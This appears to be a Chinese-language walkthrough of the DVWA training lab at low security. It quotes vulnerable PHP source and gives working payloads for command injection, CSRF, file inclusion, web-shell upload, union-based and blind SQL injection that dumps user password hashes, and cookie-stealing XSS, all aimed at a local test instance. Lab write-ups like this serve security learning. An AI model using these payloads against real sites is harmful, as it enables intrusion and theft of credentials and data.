Brute Force(暴力破解) 简单:参考pikachu通关全记录 中的# 0x01 Burt Force(暴力破解漏洞)。
Command Injection 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 <?php if ( isset ( $_POST [ 'Submit' ] ) ) { $target = $_REQUEST [ 'ip' ]; if ( stristr ( php_uname ( 's' ), 'Windows NT' ) ) { $cmd = shell_exec ( 'ping ' . $target ); } else { $cmd = shell_exec ( 'ping -c 4 ' . $target ); } echo "<pre>{$cmd} </pre>" ; } ?>
从源代码中,我们可以看出,用户通过输入ping命令,执行系统命令。然后根据服务器是否是Windows NT系统,对目标ip进行不同的ping测试。
8.142.189.231 || ipconfig 效果如下:
CSRF 观察其url:
1 http://127.0.0.1/dvwa/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=%E6%94%B9%E5%8F%98#
查看源代码:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 <?php if ( isset ( $_GET [ 'Change' ] ) ) { $pass_new = $_GET [ 'password_new' ]; $pass_conf = $_GET [ 'password_conf' ]; if ( $pass_new == $pass_conf ) { $pass_new = ((isset ($GLOBALS ["___mysqli_ston" ]) && is_object ($GLOBALS ["___mysqli_ston" ])) ? mysqli_real_escape_string ($GLOBALS ["___mysqli_ston" ], $pass_new ) : ((trigger_error ("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work." , E_USER_ERROR)) ? "" : "" )); $pass_new = md5 ( $pass_new ); $insert = "UPDATE `users` SET password = '$pass_new ' WHERE user = '" . dvwaCurrentUser () . "';" ; $result = mysqli_query ($GLOBALS ["___mysqli_ston" ], $insert ) or die ( '<pre>' . ((is_object ($GLOBALS ["___mysqli_ston" ])) ? mysqli_error ($GLOBALS ["___mysqli_ston" ]) : (($___mysqli_res = mysqli_connect_error ()) ? $___mysqli_res : false )) . '</pre>' ); echo "<pre>Password Changed.</pre>" ; } else { echo "<pre>Passwords did not match.</pre>" ; } ((is_null ($___mysqli_res = mysqli_close ($GLOBALS ["___mysqli_ston" ]))) ? false : $___mysqli_res ); } ?>
从源代码中,我们看出没有任何防护措施,例如token、验证码这些东西都没有加,安全性能低。只需要将链接发送给用户点击,攻击即可完成!
File Inclusion 1 2 3 4 5 6 <?php $file = $_GET [ 'page' ];?>
从上面图片可以看出通过该漏洞可以进行文件包含漏洞的利用,包括本地文件包含和远程文件包含进行本地信息读取等,远程包含shell等操作。
不知道为什么相对路径不行?试了一下远程文件包含没有成功,如果抛开环境问题,应该是远程文件包含。
修复方案:
1 2 3 4 5 6 1.禁止远程文件包含allow_url_include=off 2.配置open_basedir=指定目录,限制访问区域。 3.过滤../等特殊符号 4.修改Apache日志文件的存放地址 5.开启魔术引号magic_quotes_qpc=on 6.尽量不要使用动态变量调用文件,直接写要包含的文件
File Upload 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 <?php if ( isset ( $_POST [ 'Upload' ] ) ) { $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/" ; $target_path .= basename ( $_FILES [ 'uploaded' ][ 'name' ] ); if ( !move_uploaded_file ( $_FILES [ 'uploaded' ][ 'tmp_name' ], $target_path ) ) { echo '<pre>Your image was not uploaded.</pre>' ; } else { echo "<pre>{$target_path} succesfully uploaded!</pre>" ; } } ?>
未对传入的文件做过滤等操作,可直接上传PHP文件,直接包含一句话用菜刀或者蚁剑等工具即可直接连接。或者用metasploit生成PHP文件,去连接!!!
Insecure CAPTCHA
SQL Injection 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 < ?phpif( isset( $_REQUEST[ 'Submit' ] ) ) { / / Get input $id = $_REQUEST[ 'id' ]; switch ($_DVWA['SQLI_DB' ]) { case MYSQL: / / Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false )) . '</pre>' ); / / Get results while( $row = mysqli_fetch_assoc( $result ) ) { / / Get values $first = $row ["first_name"]; $last = $row ["last_name"]; / / Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } mysqli_close($GLOBALS["___mysqli_ston"]); break; case SQLITE: global $sqlite_db_connection; #$sqlite_db_connection = new SQLite3($_DVWA['SQLITE_DB' ]); #$sqlite_db_connection- > enableExceptions(true ); $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; #print $query; try { $results = $sqlite_db_connection- > query($query); } catch (Exception $e) { echo 'Caught exception: ' . $e- > getMessage(); exit(); } if ($results) { while ($row = $results- > fetchArray()) { / / Get values $first = $row ["first_name"]; $last = $row ["last_name"]; / / Feedback for end user echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>"; } } else { echo "Error in fetch ".$sqlite_db- > lastErrorMsg(); } break; } } ?>
1 通过代码分析,通过get传参,传入后端拼接到"SELECT first_name, last_name FROM users WHERE user_id = '$id';";执行
1 2 3 4 5 6 7 8 9 10 11 12 http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' and '1'='1&Submit=Submit# http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2' and '1'='2&Submit=Submit# http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1' order by 5--+&Submit=Submit# 查询字段数: http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1%27%20order%20by%202--+&Submit=Submit# 查询操作系统、版本: http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=0%27%20union%20select%201,2--+&Submit=Submit# http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2%27%20union%20select%20database(),version()%20--+&Submit=Submit# http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2%27%20union%20select%20@@version_compile_os,version()%20--+&Submit=Submit# - 得出数据库名称: dvwa 版本号:5.5.53 操作系统:Win32
查询全部数据库名称:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2' union select group_concat(schema_name),1 from information_schema.schemata –+&Submit=Submit#
查询dvwa数据库下的所有表:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2' union select group_concat(table_name),1 from information_schema.tables where table_schema=database() –+&Submit=Submit#
或者:
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2' union select group_concat(table_name),1 from information_schema.tables where table_schema=’dvwa’ –+&Submit=Submit#
查询所有 users 表的字段名
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2' union select group_concat(column_name),1 from information_schema.columns where table_name=’users’ –+&Submit=Submit#
查询所有 users 表的字段值http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=-2' union select group_concat(user_id,0x3a,user,0x2c,password,0x3b),1 from users –+&Submit=Submit#
SQL Injection(Blind) 1 2 3 4 进行’数字型‘和’字符型‘判断: http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1 and 1=3&Submit=Submit# http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20%271%27=%273&Submit=Submit# http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20%271%27=%271&Submit=Submit#
结论:判断该类型为字符型,且为单引号注入。1 http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20length(database())%3E5%20--+&Submit=Submit#
1 http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=1%27%20and%20length(database())=4%20--+&Submit=Submit#
输入语句
显示结果
1’ and ascii(substr(database(),1,1))>97#
显示存在,说明第一个字符是一个小写字母且不是a。
1’ and ascii(substr(database(),1,1))=100#
显示存在,说明第一个是d
1’ and ascii(substr(database(),2,1))=118#
显示存在,说明第二个是v
1’ and ascii(substr(database(),3,1))=119#
显示存在,说明第三个是w
1’ and ascii(substr(database(),4,1))=97#
显示存在,说明第四个是a
输入语句
显示结果
1’ and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>10#
不存在
1’ and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>8#
存在,说明dvwa第一个表长度为9
1’ and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=9#
存在,验证成功
同理可以对第二个表的长度进行猜测:
1’ and length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=5#
存在,dvwa第二个表长度为5
哎!反正就是不停的去尝试,方法如上所示。在我的另一篇博客中完整写到过盲注全过程 点击跳转
XSS(DOM) 1 2 127.0.0.1/dvwa/vulnerabilities/xss_d/?default=<script>alert(1)</script> http://127.0.0.1/dvwa/vulnerabilities/xss_d/?default=%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS (Reflected) 1 127.0.0.1/dvwa/vulnerabilities/xss_r/?name=<script>alert(1)</script>#
XSS (Stored)